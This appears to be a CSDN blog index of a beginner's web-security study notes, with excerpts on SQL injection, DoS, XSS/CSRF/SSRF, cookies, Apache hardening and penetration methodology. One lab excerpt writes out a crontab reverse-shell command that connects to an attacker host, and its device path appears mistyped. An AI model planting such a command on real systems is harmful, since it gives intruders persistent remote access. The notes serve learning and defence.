web安全
白帽梦想家
web安全初学者,喜欢网络攻防艺术,希望有朝一日能成为一名独当一面的白白白白白帽子
注释:我在CSDN上发放的所有原创内容都是在学习过程中笔记总结而来,每个字都是手打上去的,但其中有些地方可能会直接引鉴某些大牛的原话,希望各位大大不要介意,因为我真的觉得你们总结的话很经典,初学者比较好理解。。。
如果原作者有任何不满意,可以直接联系我,我会直接将其删除。最近复习知识发现自己刚开始总结的好几篇笔记都有比较严重的错误和错字,等我面试完会改正!
展开
-
SQL注入的成因及原理浅析
一、首先先介绍一下SQL注入的思维导图:二、SQL注入的成因三、SQL注入的原理用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序时意料之外结果的攻击行为某成因可以归结为以下两个原因叠加造成的:1.程序编写者在处理应用程序和数据库交互时,使用字符串拼接的方式构造SQL语句。2.未对用户可控参数进行足够的过滤便将参数内容拼接进入到SQL查询语句中。四、哪里可能存在SQL注入?1.任何客户...原创 2018-06-02 18:39:47 · 6242 阅读 · 0 评论 -
DOS和DDOS攻击的原理和区别
DOS:中文名称是拒绝服务,一切能引起DOS行为的攻击都被称为DOS攻击。该攻击的效果是使得计算机或网络无法提供正常的服务。常见的DOS攻击有针对计算机网络带宽和连通性的攻击。 DOS是单机于单机之间的攻击。DOS攻击的原理:首先攻击者向被攻击的服务器发送大量的虚假IP请求,被攻击者在收到请求后返回确认信息,等待攻击者进行确认,(此处需要拥有HTTP协议工作方式和TCP三次握手的基本知识)该过程需...原创 2018-07-03 10:24:08 · 10215 阅读 · 0 评论 -
常见Web漏洞的修复方法
SQL注入1、使用转义函数对xxx参数进行转义2、检查数据类型,使用函数对数据类型进行强制转换3、使用预编译语句XSS1、使用转义函数转义xxx参数2、重要cookie使用HttpOnly,防止Cookie被盗(1) 对一些特殊的标签进行转义;(2) 直接过滤掉JavaScript事件标签和一些特殊的html标签;(3) 将重要的cookie标记为http only;(4) 只允许用户输入我们期望...原创 2018-07-03 10:38:56 · 2918 阅读 · 0 评论 -
XSS,CSRF,SSRF三种漏洞的区别和共同点
以下言论均是个人在学习过程中总结而来,仅代表个人观点,由于博主也是web安全初学者,所以发表的观点很可能会存在一些错误或者有些不严谨的地方,如果您觉得哪里说的不对或者不合适,请随时在下方留言,希望能跟大家能够一起学习、进步,感谢。个人总结:相同点:XSS,CSRF,SSRF三种常见的Web服务端漏洞均是由于,服务器端对用户提供的可控数据过于信任或者过滤不严导致的。不同点:XSS是服务器对用户输入的...原创 2018-07-03 12:47:21 · 10477 阅读 · 0 评论 -
Cookie的属性和属性作用
Cookie属性:name字段:一个cookie的名称value字段:一个cookie的值domain字段:可以访问此cookie的域名path字段:可以访问此cookie的页面路径Size字段:此cookie大小http字段:cookie的httponly属性,若此属性为True,则只有在http请求头中会有此cookie信息,而不能通过document.cookie来访问此cookie。sec...原创 2018-07-12 14:55:46 · 7861 阅读 · 0 评论 -
为什么CSRF Token写在COOKIE里面
最近做渗透测试的时候经常看到用户的COOKIE信息里带有CSRF等字样的信息,问了一下同事,他们说这个是用来防御CSRF的字段。这一下可把我弄懵了,因为我对CSRF的理解是:攻击者盗用用户的COOKIE执行非用户本意的操作。我的想法是,用户的COOKIE就像是一张门禁卡一样,攻击者可以盗用用户的门禁卡,以被盗用户的身份来执行一些设计增删改的操作,既然用户已经盗用了用户的COOKIE刷卡进门...原创 2018-08-14 14:33:40 · 21871 阅读 · 42 评论 -
Ubuntu计划任务反弹shell
首先介绍一下实验环境1.被攻击者:Ubuntu 192.168.0.82.攻击者:kali 192.168.0.127 首先第一步在Ubuntu系统下添加crontab 计划任务* * * * * bash -i >& /etc/tcp/192.168.0.127/8888 0>&1 第二步在kali系统下使用nc命令监听8888端口...原创 2018-08-19 13:46:53 · 4183 阅读 · 0 评论 -
服务器set-cookie出现同名key的问题
首先简单介绍一下服务器set-cookie时关于path的规则cookie的path属性:它表示此cookie在哪个路径下起作用。如果服务器不设置cookie的path或设置了相同的path,则名字相同的Cookie视为相同的Cookie,后面的会覆盖前面的COOKIE,服务器设置COOKIE时是大小写敏感的。如果服务器为同名的Cookie设置了不同的path,那么这就是两个不同的CO...原创 2018-08-22 15:32:43 · 7356 阅读 · 1 评论 -
敏感信息明文传输相关问题小结
最近在工作中,由于同事对敏感信息明文传输这个漏洞认识不深,导致工作出了一些问题。经过一番研究后,发现了其中的一些小知识点,在这里跟大家分享下,具体情况是这样的:1.我们在做安全测试的时候,经常可以通过Burpsuit抓包看到一些以明文方式呈现的敏感信息,比如在页面登陆处,我们输入账号密码,通过Burpsuit抓包,可以看到如下类似的数据包。 可以看到在数据包中,用户登陆用的账号和密...原创 2018-12-24 09:41:16 · 11005 阅读 · 1 评论 -
CSRF跨站请求伪造
CSRF介绍:CSRF中文名称:跨站请求伪造,是一种“挟持用户”在当前已登陆的Web应用程序上执行“非本意操作”的攻击方法。一、CSRF回放攻击流程套用老师所给的一张攻击原理图从这张流程图里我们总结一下CSRF攻击生效所需要的两个必要条件1.被攻击者成功登陆信任站点A,并在本地生成cookie2.用户使用同一浏览器在不退出的情况下,访问带有CSRF代码的网站B二、原理介绍首先说明一点,我们并没有挟...原创 2018-06-19 21:25:21 · 530 阅读 · 0 评论 -
http报文结构分析
http协议请求包结构分析请求报文的结构:方法 URL 版本 字段名: 值字段名: 值请求消息主体1.请求报文中方法的介绍:GET 请求获取一个Web页面POST 主要作用是执行操作,比如向服务器提交一个表单DELETE 请求删除一个Web界面MOVE 请求移动某个页面到指定位置HEAD 与GET方法类似区别在于获取Web页面首部,不获取主体 也就是说只获得一个页面的He...原创 2018-06-01 11:22:59 · 2315 阅读 · 0 评论 -
书写留言板时需要注意的一些知识(注册,登陆部分)
1.在书写注册模块时:一般php的编码方式我们选择为 utf-8<meta charset="utf-8">空格字符为:&nbsp判断一个变量是否被设定使用函数isset($a)如果变量$a存在,而且被赋值了,函数就返回true 即便变量a为空值。否则就返回false判断一个变量是否为空使用函数empty($a)如何变量$a存在且数值不为空,则函数返回false如果变量a为...原创 2018-06-02 18:52:41 · 572 阅读 · 0 评论 -
书写留言板时需要留意的一些知识——编辑,删除页面
1.首先第一步,从URL中接受传递过来的变量值$uid=_GET['uid'];_GET[]数组是一个超全局变量,用来接收从URL中传来的变量值2.如果规定用户只能修改自己的留言而无权修改他人留言,则需要启用SESSION和通过URL向页面传递该留言归属者的uid需要进行如上判断3.需要用到的数据库更新语句为update 表名 set 字段名=更该改后的值 where id=该留言的id4.需要注...原创 2018-06-02 18:54:40 · 418 阅读 · 0 评论 -
书写留言板时需要留意的一些知识——个人中心,上传和注销
一、个人中心页面1.首先第一步,从URL中接受传递过来的变量值$uid=_GET['uid'];_GET[]数组是一个超全局变量,用来接收从URL中传来的变量值2.在表格内我们通过<img>标签,向浏览器内插入一张图片通过使用width=""属性来规定图片的宽通过使用high=""属性来规定图片的高当然我们还需要选用一张图片作为用户的默认头像默认头像的名字和存放位置,参考建立数据库时写...原创 2018-06-02 18:58:12 · 292 阅读 · 0 评论 -
书写留言板时需要留意的一些知识——留言板界面
在书写留言版之前,首先需要搞懂两个前置知识SESSION 和 COOKIE这两个函数都被用来执行身份验证操作不同点是 session保存在服务器端 (用户不能修改,相对较安全)cookie保存在浏览器客户端(用户是可惜修改的)SESSION的工作原理:当我们用浏览器打开一个带有SESSION的网页时,网页会给我们下发一个经过加密的COOKIE值同时在服务器的某个文件夹下,服务器会自动创建一个以该...原创 2018-06-02 19:03:07 · 1254 阅读 · 0 评论 -
留言板个人代码展示墙
每逢期末,各科专业课的课程设计相信会让许多和我一样的大学生磨破脑袋,本着与人为善,授人予鱼的思想,我决定。。。。。。好吧,你懂的,废话不多说,上菜! 留言板功能模块 一、注册模块 二、登陆模块三、留言板界面四、留言模块五、对个人留言的...原创 2018-06-06 10:23:13 · 8024 阅读 · 0 评论 -
针对单个网站的渗透思路(精)
本人Web安全初学者,从老师那里获得了一套很完整的针对单一网站的渗透思路今天起的早,就自己试着总结一份,记下来。分享给大家。首先,当我们拿到一个网站的域名或者IP的时候。最先要做的是信息收集。下面着重介绍一下信息收集模块一、信息收集——端口扫描与分析1.得到域名后查IP:推荐使用站长工具,选择whois查询和IP反查询,通过ping该域名查看IP。还可以在站长之家下面找到IP的 WHOIS查询,这...原创 2018-06-13 12:16:28 · 32888 阅读 · 15 评论 -
Apache安全之404页面和默认页面安全
404页面敏感信息的隐藏首先开启httpd服务,然后curl -I 本机IP查看一下响应头信息可以在这里清楚地看到apache的版本号,和操作系统在这里我们要将这些敏感信息隐藏首先打开/etc/httpd/conf/httpd.confServerTokens OS 改为 ServerTokens ProdServerSignature On 改为 ServerSignature Off保存退...原创 2018-06-01 10:12:54 · 5672 阅读 · 0 评论 -
Apache之文件列目录安全
当我们访问网站根目录下的一个文件夹时网站会自动将该目录下的所以内容显示出来,黑客可以讲这些文件右键-另存为,直接将源码保存,或者本目录下可能存在敏感信息,可以帮黑客快速拿下站点加固方法:1.打开/etc/httpd/conf/httpd.conf文件找FollowSymLinks关键字 必须是根目录下的<Directory "/var/www/html">Options indexe...原创 2018-06-01 10:32:17 · 1584 阅读 · 0 评论 -
URL详解
首先什么是URL,在老师讲课时看到一张图,我觉得挺好,就直接把图粘过来了URL的组成scheme:// login:password @address:port/path/to/resource ?query_string #fragmentscheme:这个字段表示传输协议常见的协议有:file :访问本机的文件ftp :访问ftp服务器的协议https :通过SSL协议的HTTP访问WEB服...原创 2018-06-01 10:52:22 · 1423 阅读 · 0 评论 -
不同于Token和Refer头校验的另一种CSRF防御办法
事情的情况是这样的,前段时间在工作中发现XX系统存在CSRF漏洞,我在数据包内并未看到对应的Token参数,测试Refer头后发现XX系统并未对请求来源(refer)进行相关校验。我便认为此处存在CSRF漏洞并将该漏洞发送给了XX系统的相关负责人。但是过了几天后XX系统的负责人发来一份反馈邮件,邮件说他们系统做了CSRF校验但用的不是Token也不是Refer。而是如下方法:...原创 2018-12-24 11:42:16 · 2346 阅读 · 2 评论